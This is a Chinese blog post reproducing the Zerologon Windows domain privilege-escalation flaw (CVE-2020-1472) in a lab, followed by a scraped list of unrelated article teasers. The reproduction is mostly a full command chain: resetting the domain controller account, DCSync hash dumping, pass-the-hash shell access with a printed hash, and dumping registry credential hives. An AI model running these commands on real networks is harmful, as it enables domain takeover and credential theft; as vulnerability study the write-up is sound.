这是什么娃哈哈
这是什么娃哈哈

NetLogon 域内提权漏洞(CVE-2020-1472)

NetLogon 域内提权漏洞(CVE-2020-1472)复现

摘要

2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分

攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序

影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

复现环境

版本: Windows Server 2012
IP: 10.99.99.253
Blosname: OWA2013   (域控的主机名)

漏洞脚本

impacket               https://github.com/SecureAuthCorp/impacket
重置域内管理员密码poc    https://github.com/dirkjanm/CVE-2020-1472
恢复密码poc             https://github.com/risksense/zerologon

复现开始

首先使用exp重置管理员密钥

python3 cve-2020-1472-exploit.py OWA2013 10.99.99.253

通过 Dcsync获取域内所有有用户hash

python3 secretsdump.py rootkit/OWA2013\[email protected] -just-dc -no-pass

得到了域控的 Hash:

rootkit.org\Administrator:500:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::

通过 wmic hash 传递获取shell:

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c rootkit.org/[email protected]

通过导出 sam system 等文件到本地,获取域控机器上本地保存之前的 hash 值用于恢复,不然就脱域了:

备份注册表

导出注册表文件
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

将文件下载到本地
get system.save
get sam.save
get security.save

删除文件
del /f system.save
del /f sam.save
del /f security.save

之后你会发现再你的当前机器会生成几个文件:sam.save、security.save、system.save


之后通过 sam.save、security.save、system.save 这些文件获得原来域控机器上的 Ntlm Hash 值,用于恢复密码:

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

通过拿到 $MACHINE.ACC: 的值,然后进行恢复(注意只有后半部分)

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:7e304360db8cdb95d09a960607fcc526

恢复密码

python3 reinstall_original_pw.py OWA2013 10.99.99.253 7e304360db8cdb95d09a960607fcc526

验证是否恢复密码成功

python3 secretsdump.py rootkit/OWA2013\[email protected] -just-dc -no-pass

你可能感兴趣的:(NetLogon 域内提权漏洞(CVE-2020-1472))

  • 【西安电子科技大学考研】25官方复试专业课参考书目汇总 西电研梦 考研西电经验分享面试西安电子科技大学
    初试已经顺利考完啦、成绩已经公布,现在已经有很多同学来问学长学姐,复试参考书有哪些,复试应该做好哪些准备。故此学长学姐给大家整理好了西安电子科技大学各个学院的复试参考书目录,有需要的同学可以参考一下哈。大家可以结合本篇文章内容与招生目录参考书对比一下:【西电考研复试资料、讲课班陆续上线中~~~】有的参考书更新了版本,但是招生目录里仍然是之前的一些旧版本,关于参考书的版本问题,大家也可以在群内问一下
  • 【2025年春季】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 白帽子凯哥 web安全学习安全CTF夺旗赛网络安全
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、SQL注入(7-8天)2、文件上传(7-8天)3、其他漏洞(14-15
  • CVE-2017-5645(使用 docker 搭建) JM丫 网络安全
    介绍:是一个与ApacheLog4j2相关的安全漏洞,属于远程代码执行,它可能允许攻击者通过构造恶意的日志信息在目标系统上执行任意代码Log4j2介绍Log4j2是Apache的一个日志记录工具,属于Java应用的日志框架,它是Log4j的升级版,性能更好,功能更多.它被广泛的适用于Java应用程序中,帮助开发者记录程序运行的时候的日子信息,是Java生态系统中最重要的一个日志框架之一漏洞编号:C
  • python缩进几个空格-解析Python的缩进规则的使用 weixin_39962675
    Python中的缩进(Indentation)决定了代码的作用域范围。这一点和传统的c/c++有很大的不同(传统的c/c++使用花括号{}符,python使用缩进空格)。每行代码中开头的空格数(whitespace)用于计算该行代码的缩进级别(Indentationlevel),注意一个Tab等于8个空格(Space),缩进级别为0表示无缩进空格。Python中的每一条语句都有一个缩进级别,并且缩
  • 走出内卷的困局 盐论君 创业创新社交电子远程工作求职招聘
    《逃避自由》的作者若能体会《平凡的世界》中孙少平的苦难,就不会以一种消极的口吻提出:人们想要的自由是不需要负责任的自由。如果一个人连体会工作伦理的前提都不具备,那么我们不妨认为父辈们希望后代追求稳定的生活和工作是对的。对于一直生活在不稳定中的大多数人,自由是令人畏惧的,只有当他们拥有对抗这份恐惧的能力时,自由才能真正让人‘横眉冷对千夫指’,但想要做到这一点的前提恰恰是先要拥有一份较为稳定的工作,内
  • 2025-03-15 学习记录--C/C++-PTA 练习3-4 统计字符 小呀小萝卜儿 学习-C/C++学习c语言
    合抱之木,生于毫末;九层之台,起于累土;千里之行,始于足下。一、题目描述⭐️练习3-4统计字符本题要求编写程序,输入10个字符,统计其中英文字母、空格或回车、数字字符和其他字符的个数。输入格式:输入为10个字符。最后一个回车表示输入结束,不算在内。输出格式:在一行内按照letter=英文字母个数,blank=空格或回车个数,digit=数字字符个数,other=其他字符个数的格式输出。输入样例:a
  • 2025-03-13 学习记录--C/C++-PTA 练习2-9 整数四则运算 小呀小萝卜儿 学习-C/C++学习c语言
    合抱之木,生于毫末;九层之台,起于累土;千里之行,始于足下。一、题目描述⭐️练习2-9整数四则运算本题要求编写程序,计算2个正整数的和、差、积、商并输出。题目保证输入和输出全部在整型范围内。输入格式:输入在一行中给出2个正整数A和B。输出格式:在4行中按照格式“A运算符B=结果”顺序输出和、差、积、商。输入样例:32输出样例:3+2=53-2=13*2=63/2=1二、代码(C语言)⭐️#incl
  • 安全物理环境 bubble87 安全
    物理位置选择基本要求:机房应位于具有防震、防风和防雨能力的建筑内,需提供抗震设防审批文档。避免设置在建筑物顶层或地下室,否则需加强防水防潮措施。测评方法:核查建筑物抗震设防文档、屋顶/墙体/门窗的防雨渗漏情况。检查机房所在楼层是否为顶层或地下室(如机房位于三层和四层不在顶楼,符合要求)。物理访问控制(高风险项)基本要求:机房出入口应配置电子门禁系统(如指纹、密码、人脸识别),记录人员进出信息。测评
  • 文档管理系统OnlyOffice在线编辑功能 天翎MyApps低代码平台 知识文档管理word
    随着信息化时代的发展,越来越多的企业需求文档在线协作功能,正是在此趋势下,天翎知识文档管理系统联合OnlyOffice插件满足企业在线协同的需求,插件部署到服务器后,系统操作用户直接在浏览器操作即可实现在线编辑操作,无需额外在用户操作电脑中安装插件。①文档内容解析用户根据word模板建立对应的域并填写内容,用户上传word到系统中,系统中调用POI接口将用户上传的word填写的内容进行获取到系统操
  • 我们的AI人工智能,自动发布了一篇假新闻…… 数据断案 数据人的故事人工智能数据库sqloracle数据分析
    今天这个故事,还得从一个事故开始说起。前些日子,我们被XX公司投诉,说我们的资讯发布了关于他们公司授信额度的不实报道:告诉我们这篇资讯与他们公司最新公开披露的数据不一致,相关内容并不属实,可能对广大网友们造成严重误导,并对他们公司造成了严重负面影响……balabala一堆指责,并要求我们3小时内删除全部相关信息。然后,他们丢了2篇公告附件过来。我们对照着仔细一看,还真是我们搞错了:由于数据错误,“
  • metasploit内网篇之steal_token窃取令牌(十四) 暴躁的小胡!!! 网络web安全安全
    ps#查看系统进程信息steal_token#从指定进程中窃取tokendrop_token#删除窃取的token我们先列出进程然后窃取steal_token400我们删除drop_token然后我们窃取域普通用户的token发现不成功那麽我们就迁移进程就成功了我们开启远程桌面在我们的域控上然后链接12server5就多了进程这里看到有好多然后我们迁移迁移到域管理员状态然后加载kiwi获取hash
  • Android Dagger2 框架作用域管理模块深度剖析(五) &有梦想的咸鱼& AndroidDagger2原理android
    一、引言在Android开发中,依赖注入(DependencyInjection,简称DI)是一种重要的设计模式,它能有效降低代码之间的耦合度,提升代码的可测试性和可维护性。Dagger2作为一款强大的依赖注入框架,凭借其在编译时生成依赖注入代码的特性,避免了运行时反射带来的性能开销。而作用域管理模块是Dagger2中极为关键的一部分,它能精准控制依赖对象的生命周期,确保在特定作用域内依赖对象的唯
  • 【从零开始学习计算机科学】软件工程(五)软件设计 贫苦游商 学习软件工程软件开发软件设计敏捷开发极限编程软件需求
    【从零开始学习计算机科学】软件工程(五)软件设计软件设计概述良好的设计具有三大特性设计主要包含的方面设计中的一些概念设计的方法与策略体系结构设计体系结构设计的基本问题:体系结构的设计模式体系结构设计的过程构建级设计面向对象构件设计用户接口设计用户接口设计原则:用户接口分析的目标:设计的评审软件设计概述软件的分析偏重于问题域,描述软件要做什么,而设计则偏重于解决方案,描述软件究竟要如何做。设计创建了
  • 97.HarmonyOS NEXT跑马灯组件教程:基础概念与架构设计 harmonyos-next
    温馨提示:本篇博客的详细代码已发布到git:https://gitcode.com/nutpi/HarmonyosNext可以下载运行哦!HarmonyOSNEXT跑马灯组件教程:基础概念与架构设计1.跑马灯组件概述跑马灯(Marquee)是一种常见的UI组件,主要用于在有限的空间内展示超出显示区域的文本内容。当文本内容过长无法在固定宽度内完整显示时,跑马灯组件会使文本自动滚动,以便用户可以查看全
  • 京准电钟分享:水利系统NTP网络时间服务器应用 北京华人开创公司 时钟系统北斗卫星授时NTP时间同步网络服务器运维时间同步时钟同步NTP服务器网络时间服务器
    京准电钟分享:水利系统NTP网络时间服务器应用京准电钟分享:水利系统NTP网络时间服务器应用1.项目背景水利控制系统涵盖水文监测、闸门控制、泵站调度、数据采集与传输等多个子系统,设备分布广泛且需协同工作。系统内各设备(如PLC、RTU、SCADA服务器、传感器等)的时间一致性直接影响数据记录的准确性、事件报警的时序性以及故障分析的可靠性。为实现全系统高精度时间同步,需部署NTP(NetworkTi
  • 京准电钟:体育馆GPS北斗卫星校时钟系统 北京华人开创公司 时钟系统北斗卫星授时NTP时间同步时钟系统子母钟系统NTP时钟卫星校时钟网络授时系统时间同步系统
    京准电钟:体育馆GPS北斗卫星校时钟系统京准电钟:体育馆GPS北斗卫星校时钟系统一、系统架构与组成主控系统(母钟)采用GPS/北斗双模接收模块,通过卫星信号获取标准UTC时间,精度可达±100ns14。主备冗余设计:两台母钟互为热备份,故障时自动切换(切换时间<50ms),内置铷原子钟或恒温晶振作为守时源,确保卫星失锁24小时内误差不超过20μs234。支持NTP/SNTP协议,为网络设备提供时间
  • 京准电钟分享:医院网络内NTP时间同步服务器作用是什么? 北京华人开创公司 北斗卫星授时NTP时间同步GPS对时装置NTP时间同步服务器网络时间服务器NTP时间服务器网络系统时钟同步
    京准电钟分享:医院网络内NTP时间同步服务器作用是什么?京准电钟分享:医院网络内NTP时间同步服务器作用是什么?时间同步技术必定将是整个大数据处理系统的重要支撑和保障。时间同步技术使数据产生与处理系统的所有节点具有全局的、统一的标准时间,从而使系统中的所有各种消息、事件、节点、数据等具备正确的逻辑性、协调性以及可追溯性。大数据产生与处理系统是各种计算设备集群的,计算设备将统一、同步的标准时间用于记
  • 方案精读:185页PPT基于IPD流程的研发项目管理讲座 智慧化智能化数字化方案 项目经理售前工程师技能提升IPD流程体系IPD研发管理ipd项目管理IPD流程管理IPD端到端IPD流程细则IPD基础知识
    (本解读资料未包含于绑定资源内)绑定资源文档清单:2024版基于华为IPD与质量管理体系融合的研发质量管理(63页).pptxIPD流程操作细则(55页).pptxIPD的基础知识介绍(54页).pptIPD端到端流程培训方案【115页PPT】.ppt华为IPDCMM项目管理培训教材(41页).pptx华为IPD流程体系设计方法论(123页).pptx华为IPD项目管理“六步一法”.ppt华为的I
  • 类和对象(上) 带鱼吃猫 C++c++开发语言学习
    一、类的定义1.1类定义的格式class为定义类的关键字,Stack为类的名字,{}中为类的主体,注意类定义结束时后面分号不能省略。#includeusingnamespacestd;//定义一个类名为Stack的类classStack{public://成员函数:intADD(){return_key+_value;}private://成员变量:int_key;int_value;};类体中内
  • 关于py不能导入pyw文件内的class的问题 Auspemak-Derafru python
    我有一个window类,调了另外一个py文件里面自己写的class有一天去朋友家玩,顺便想跑一下那个代码,由于他没有编译器,我也没有打包成可执行程序,就安了一个idle。由于我的window类是用qt写的,懒得再pip下载了,就直接在原文件后面加了个main函数,改后缀名为pyw直接跑了回去之后用我的pycham打开,window类直接跑不了了,提示导包错误看了一下竟然是我之前改了的那个文件的问题
  • 【产品经理】设计一流产品九步法 程矢 Axure原型设计axure
    转载自:老二牛车教育»【产品经理】设计一流产品九步法百度高管舒迅(@舒迅)曾经带领百度贴吧创造出一年内用户注册量增长10倍、浏览量3倍增长的奇迹,作为一名在中国互联网摸爬滚打超过12年的老兵,在和百度内部同事的相互磨砺中,总结出了极其丰富而是用的产品设计经验。他在这篇文章中介绍的九条方法不仅值得每一个PM的认真学习,同样也值得每一个有志于打造出一流产品的互联网创业者和从业者的揣摩。本文描述的产品设
  • 3月16日中场五大联赛+德乙赛果预测与临场策略部分公推 weixin_66725336 后端
    【007前进之鹰vs威廉二世】前进之鹰主场强势全取三分【阵容动态】前进之鹰21岁前锋米兰·斯梅茨连续两轮首发出战,上轮贡献关键进球扩大比分,本场将继续担任锋线主力。进攻核心安治文状态爆棚,近两轮打入3球成为队内头号得分手,需重点盯防。威廉二世虽迎回伤愈中卫汤米·雅各布改踢三中卫体系,但防守仍漏洞百出。预计左翼卫施古德松将回撤担任左后卫强化边路防守。【伤停名单】前进之鹰:坦斯迪治(中场)、斯图卡斯(
  • 附下载 | 2024 OWASP Top 10 基础设施安全风险.pdf 安全方案 OWASP基础设施安全
    《2024OWASPTop10基础设施安全风险》报告,由OWASP(开放网络应用安全项目)发布,旨在提升企业和组织对基础设施安全风险、威胁与漏洞的意识,并提供高质量的信息和最佳实践建议。报告列出了2024年最重要的10大基础设施安全风险,并通过案例分析展示了这些风险的实际影响。一、报告背景与目的背景:2024企业信息安全峰会以“直面信息安全挑战,创造最佳实践”为主题,聚焦信息安全技术与实践,致力于
  • C++|构造函数和析构函数 柯ran C++程序设计c++开发语言
    一、构造函数构造函数是一种特殊的成员函数,主要用于创建对象时对对象进行初始化操作,即专门用于构造新对象,并赋值对象的成员数据。在C++里,构造函数的名称和类名相同,并且没有返回类型。当创建类的对象时,构造函数会自动被调用。构造函数可以在类内也可在类外定义。构造函数在类内的定义格式如下:类名(参数列表){函数体;}在类外定义构造函数的形式如下:类名::类名(形参列表){函数体;}构造函数可以重载,即
  • 数据结构与算法-图论-二分图 一个人在码代码的章鱼 #图论算法学习图论算法
    关押罪犯(贪心+二分答案+染色法判定二分图/扩展域并查集)题目描述S城现有两座监狱,一共关押着N名罪犯,编号分别为1∼N。他们之间的关系自然也极不和谐。很多罪犯之间甚至积怨已久,如果客观条件具备则随时可能爆发冲突。我们用“怨气值”(一个正整数值)来表示某两名罪犯之间的仇恨程度,怨气值越大,则这两名罪犯之间的积怨越多。如果两名怨气值为c的罪犯被关押在同一监狱,他们俩之间会发生摩擦,并造成影响力为c的
  • exfat默认配置大小_U盘exFAT格式好不好?格式化分配单元大小多少合适? 喵喵蜜 exfat默认配置大小
    2019年9月1日通常,格式化分配单元越小,节省的空间越多。分配单元越大,节省的时间越多,但浪费空间。这看起来似乎分配单元小能节省空间,但事实并非如此。文件分割的块越多,特别是当这些存储器单元分散时,它会浪费一些时间来读取数据。分配单元大小是系统读取和写入磁盘,和可移动存储设备的最小单元。在极限速度内,分配单元的尺寸越大,读/写速度越快,反之亦然。但在这里我们必须注意一个问题,分配的单位越大,浪费
  • 【商城实战(23)】筑牢安全防线,防范常见漏洞 奔跑吧邓邓子 商城实战安全商城实战uniappSpringBootElementplusSQL注入CSRF
    【商城实战】专栏重磅来袭!这是一份专为开发者与电商从业者打造的超详细指南。从项目基础搭建,运用uniapp、ElementPlus、SpringBoot搭建商城框架,到用户、商品、订单等核心模块开发,再到性能优化、安全加固、多端适配,乃至运营推广策略,102章内容层层递进。无论是想深入钻研技术细节,还是探寻商城运营之道,本专栏都能提供从0到1的系统讲解,助力你打造独具竞争力的电商平台,开启电商实战
  • 黑客最容易攻击的地方 冬冬小圆帽 json
    黑客最容易攻击的地方通常集中在应用程序的漏洞、配置错误或用户输入处理不当等方面。1.跨站脚本攻击(XSS)XSS攻击是黑客通过注入恶意脚本到网页中,使其在用户浏览器中执行。常见的XSS攻击点包括:反射型XSS:攻击者将恶意脚本作为参数注入到URL中,服务器未对输入进行过滤,直接将恶意脚本返回给用户。存储型XSS:恶意脚本被存储在服务器上(如数据库),当其他用户访问该页面时,脚本被执行。示例代码:/
  • python测试工具 doctest pythondoctest
    python调试工具doctestbriefintroductiondoctest是python自带的一个调试测试工具,可用于初步检测你写的python程序的输入与输出结果是否符合你的预期通过在自己写的函数内,按照规定的格式写上你想要对比的输入输出结果,再使用python3-mdoctestexample.py(example.py是你要test的python程序),python会自动帮你用你的输
  • Python精进系列: K-Means 聚类算法调用库函数和手动实现对比分析 进一步有进一步的欢喜 Python精进系列算法pythonkmeans
    一、引言在机器学习领域,聚类分析是一种重要的无监督学习方法,用于将数据集中的样本划分为不同的组或簇,使得同一簇内的样本具有较高的相似性,而不同簇之间的样本具有较大的差异性。K-Means聚类算法是最常用的聚类算法之一,它以其简单性和高效性在数据挖掘、图像分割、模式识别等领域得到了广泛应用。本文将详细介绍K-Means聚类算法,并分别给出调用现成函数和不调用任何现成函数实现K-Means聚类的代码示
  • TOMCAT在POST方法提交参数丢失问题 357029540 javatomcatjsp
    摘自http://my.oschina.net/luckyi/blog/213209 昨天在解决一个BUG时发现一个奇怪的问题,一个AJAX提交数据在之前都是木有问题的,突然提交出错影响其他处理流程。 检查时发现页面处理数据较多,起初以为是提交顺序不正确修改后发现不是由此问题引起。于是删除掉一部分数据进行提交,较少数据能够提交成功。 恢复较多数据后跟踪提交FORM DATA ,发现数
  • 在MyEclipse中增加JSP模板 删除-2008-08-18 ljy325 jspxmlMyEclipse
    在D:\Program Files\MyEclipse 6.0\myeclipse\eclipse\plugins\com.genuitec.eclipse.wizards_6.0.1.zmyeclipse601200710\templates\jsp  目录下找到Jsp.vtl,复制一份,重命名为jsp2.vtl,然后把里面的内容修改为自己想要的格式,保存。 然后在 D:\Progr
  • JavaScript常用验证脚本总结 eksliang JavaScriptjavaScript表单验证
         转载请出自出处:http://eksliang.iteye.com/blog/2098985        下面这些验证脚本,是我在这几年开发中的总结,今天把他放出来,也算是一种分享吧,现在在我的项目中也在用!包括日期验证、比较,非空验证、身份证验证、数值验证、Email验证、电话验证等等...! &nb
  • 微软BI(4) 18289753290 微软BI SSIS
    1) Q:查看ssis里面某个控件输出的结果:  A MessageBox.Show(Dts.Variables["v_lastTimestamp"].Value.ToString()); 这是我们在包里面定义的变量 2):在关联目的端表的时候如果是一对多的关系,一定要选择唯一的那个键作为关联字段。 3) Q:ssis里面如果将多个数据源的数据插入目的端一
  • 定时对大数据量的表进行分表对数据备份 酷的飞上天空 大数据量
    工作中遇到数据库中一个表的数据量比较大,属于日志表。正常情况下是不会有查询操作的,但如果不进行分表数据太多,执行一条简单sql语句要等好几分钟。。   分表工具:linux的shell + mysql自身提供的管理命令 原理:使用一个和原表数据结构一样的表,替换原表。   linux shell内容如下: =======================开始 
  • 本质的描述与因材施教 永夜-极光 感想随笔
             不管碰到什么事,我都下意识的想去探索本质,找寻一个最形象的描述方式。        我坚信,世界上对一件事物的描述和解释,肯定有一种最形象,最贴近本质,最容易让人理解        &
  • 很迷茫。。。 随便小屋 随笔
    小弟我今年研一,也是从事的咱们现在最流行的专业(计算机)。本科三流学校,为了能有个更好的跳板,进入了考研大军,非常有幸能进入研究生的行业(具体学校就不说了,怕把学校的名誉给损了)。   先说一下自身的条件,本科专业软件工程。主要学习就是软件开发,几乎和计算机没有什么区别。因为学校本身三流,也就是让老师带着学生学点东西,然后让学生毕业就行了。对专业性的东西了解的非常浅。就那学的语言来说
  • 23种设计模式的意图和适用范围 aijuans 设计模式
    Factory Method 意图 定义一个用于创建对象的接口,让子类决定实例化哪一个类。Factory Method 使一个类的实例化延迟到其子类。   适用性 当一个类不知道它所必须创建的对象的类的时候。   当一个类希望由它的子类来指定它所创建的对象的时候。   当类将创建对象的职责委托给多个帮助子类中的某一个,并且你希望将哪一个帮助子类是代理者这一信息局部化的时候。 Abstr
  • Java中的synchronized和volatile aoyouzi javavolatilesynchronized
    说到Java的线程同步问题肯定要说到两个关键字synchronized和volatile。说到这两个关键字,又要说道JVM的内存模型。JVM里内存分为main memory和working memory。 Main memory是所有线程共享的,working memory则是线程的工作内存,它保存有部分main memory变量的拷贝,对这些变量的更新直接发生在working memo
  • js数组的操作和this关键字 百合不是茶 js数组操作this关键字
    js数组的操作;   一:数组的创建: 1、数组的创建 var array = new Array(); //创建一个数组 var array = new Array([size]); //创建一个数组并指定长度,注意不是上限,是长度 var arrayObj = new Array([element0[, element1[, ...[, elementN]]]
  • 别人的阿里面试感悟 bijian1013 面试分享工作感悟阿里面试
    原文如下:http://greemranqq.iteye.com/blog/2007170         一直做企业系统,虽然也自己一直学习技术,但是感觉还是有所欠缺,准备花几个月的时间,把互联网的东西,以及一些基础更加的深入透析,结果这次比较意外,有点突然,下面分享一下感受吧!    &nb
  • 淘宝的测试框架Itest Bill_chen springmaven框架单元测试JUnit
    Itest测试框架是TaoBao测试部门开发的一套单元测试框架,以Junit4为核心, 集合DbUnit、Unitils等主流测试框架,应该算是比较好用的了。 近期项目中用了下,有关itest的具体使用如下: 1.在Maven中引入itest框架: <dependency>   <groupId>com.taobao.test</groupId&g
  • 【Java多线程二】多路条件解决生产者消费者问题 bit1129 java多线程
    package com.tom; import java.util.LinkedList; import java.util.Queue; import java.util.concurrent.ThreadLocalRandom; import java.util.concurrent.locks.Condition; import java.util.concurrent.loc
  • 汉字转拼音pinyin4j 白糖_ pinyin4j
    以前在项目中遇到汉字转拼音的情况,于是在网上找到了pinyin4j这个工具包,非常有用,别的不说了,直接下代码:   import java.util.HashSet; import java.util.Set; import net.sourceforge.pinyin4j.PinyinHelper; import net.sourceforge.pinyin
  • org.hibernate.TransactionException: JDBC begin failed解决方案 bozch ssh数据库异常DBCP
    org.hibernate.TransactionException: JDBC begin failed:     at org.hibernate.transaction.JDBCTransaction.begin(JDBCTransaction.java:68)    at org.hibernate.impl.SessionImp
  • java-并查集(Disjoint-set)-将多个集合合并成没有交集的集合 bylijinnan java
    import java.util.ArrayList; import java.util.Arrays; import java.util.HashMap; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Map; import java.ut
  • Java PrintWriter打印乱码 chenbowen00 java
    一个小程序读写文件,发现PrintWriter输出后文件存在乱码,解决办法主要统一输入输出流编码格式。 读文件: BufferedReader 从字符输入流中读取文本,缓冲各个字符,从而提供字符、数组和行的高效读取。 可以指定缓冲区的大小,或者可使用默认的大小。大多数情况下,默认值就足够大了。 通常,Reader 所作的每个读取请求都会导致对基础字符或字节流进行相应的读取请求。因
  • [天气与气候]极端气候环境 comsci 环境
          如果空间环境出现异变...外星文明并未出现,而只是用某种气象武器对地球的气候系统进行攻击,并挑唆地球国家间的战争,经过一段时间的准备...最大限度的削弱地球文明的整体力量,然后再进行入侵......      那么地球上的国家应该做什么样的防备工作呢?  &n
  • oracle order by与union一起使用的用法 daizj UNIONoracleorder by
    当使用union操作时,排序语句必须放在最后面才正确,如下: 只能在union的最后一个子查询中使用order by,而这个order by是针对整个unioning后的结果集的。So: 如果unoin的几个子查询列名不同,如 Sql代码  select supplier_id, supplier_name  from suppliers  UNI
  • zeus持久层读写分离单元测试 deng520159 单元测试
    本文是zeus读写分离单元测试,距离分库分表,只有一步了.上代码: 1.ZeusMasterSlaveTest.java package com.dengliang.zeus.webdemo.test; import java.util.ArrayList; import java.util.List; import org.junit.Assert; import org.j
  • Yii 截取字符串(UTF-8) 使用组件 dcj3sjt126com yii
    1.将Helper.php放进protected\components文件夹下。 2.调用方法:   Helper::truncate_utf8_string($content,20,false);   //不显示省略号  Helper::truncate_utf8_string($content,20);  //显示省略号  &n
  • 安装memcache及php扩展 dcj3sjt126com PHP
    安装memcache    tar zxvf memcache-2.2.5.tgz     cd memcache-2.2.5/     /usr/local/php/bin/phpize (?)    ./configure --with-php-confi
  • JsonObject 处理日期 feifeilinlin521 javajsonJsonOjbectJsonArrayJSONException
        写这边文章的初衷就是遇到了json在转换日期格式出现了异常 net.sf.json.JSONException: java.lang.reflect.InvocationTargetException  原因是当你用Map接收数据库返回了java.sql.Date 日期的数据进行json转换出的问题话不多说  直接上代码  &n
  • Ehcache(06)——监听器 234390216 监听器listenerehcache
    监听器          Ehcache中监听器有两种,监听CacheManager的CacheManagerEventListener和监听Cache的CacheEventListener。在Ehcache中,Listener是通过对应的监听器工厂来生产和发生作用的。下面我们将来介绍一下这两种类型的监听器。  
  • activiti 自带设计器中chrome 34版本不能打开bug的解决 jackyrong Activiti
      在acitivti modeler中,如果是chrome 34,则不能打开该设计器,其他浏览器可以, 经证实为bug,参考 http://forums.activiti.org/content/activiti-modeler-doesnt-work-chrome-v34 修改为,找到 oryx.debug.js 在最头部增加 if (!Document.
  • 微信收货地址共享接口-终极解决 laotu5i0 微信开发
       最近要接入微信的收货地址共享接口,总是不成功,折腾了好几天,实在没办法网上搜到的帖子也是骂声一片。我把我碰到并解决问题的过程分享出来,希望能给微信的接口文档起到一个辅助作用,让后面进来的开发者能快速的接入,而不需要像我们一样苦逼的浪费好几天,甚至一周的青春。各种羞辱、谩骂的话就不说了,本人还算文明。    如果你能搜到本贴,说明你已经碰到了各种 ed
  • 关于人才 netkiller.github.com 工作面试招聘netkiller人才
    关于人才 每个月我都会接到许多猎头的电话,有些猎头比较专业,但绝大多数在我看来与猎头二字还是有很大差距的。 与猎头接触多了,自然也了解了他们的工作,包括操作手法,总体上国内的猎头行业还处在初级阶段。 总结就是“盲目推荐,以量取胜”。 目前现状 许多从事人力资源工作的人,根本不懂得怎么找人才。处在人才找不到企业,企业找不到人才的尴尬处境。 企业招聘,通常是需要用人的部门提出招聘条件,由人
  • 搭建 CentOS 6 服务器 - 目录 rensanning centos
    (1) 安装CentOS ISO(desktop/minimal)、Cloud(AWS/阿里云)、Virtualization(VMWare、VirtualBox) 详细内容 (2) Linux常用命令 cd、ls、rm、chmod...... 详细内容 (3) 初始环境设置 用户管理、网络设置、安全设置...... 详细内容 (4) 常驻服务Daemon
  • 【求助】mongoDB无法更新主键 toknowme mongodb
      Query query = new Query();          query.addCriteria(new Criteria("_id").is(o.getId()));                &n
  • jquery 页面滚动到底部自动加载插件集合 xp9802 jquery
    很多社交网站都使用无限滚动的翻页技术来提高用户体验,当你页面滑到列表底部时候无需点击就自动加载更多的内容。下面为你推荐 10 个 jQuery 的无限滚动的插件: 1. jQuery ScrollPagination jQuery ScrollPagination plugin 是一个 jQuery 实现的支持无限滚动加载数据的插件。 2. jQuery Screw S
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他